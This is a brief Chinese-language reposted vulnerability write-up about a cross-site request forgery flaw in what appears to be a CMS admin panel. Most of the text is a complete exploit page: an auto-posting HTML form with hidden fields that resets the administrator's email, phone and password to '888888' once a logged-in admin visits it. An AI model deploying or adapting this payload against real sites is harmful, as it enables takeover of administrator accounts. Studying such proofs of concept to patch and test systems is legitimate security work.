声明
该文章为转载总结文章,如有侵权,请联系JoCatWFY@163.com
漏洞简介
漏洞概述
恶意攻击者可以精心伪造一个html页面诱骗已登录的管理用户点击,从而更改管理员账户密码。
POC实现代码如下:
exp代码如下:
<html> <body> <script>history.pushState('', '', '/')</script> <form action="http://127.0.0.1/admin.php?c=member&m=edit&uid=1" method="POST"> <input type="hidden" name="page" value="0" /> <input type="hidden" name="member[email]" value="admin@163.com" /> <input type="hidden" name="member[name]" value="admin" /> <input type="hidden" name="member[phone]" value="18888888888" /> <input type="hidden" name="member[password]" value="888888" /> <input type="submit" value="Submit request" /> </form> </body> </html>
|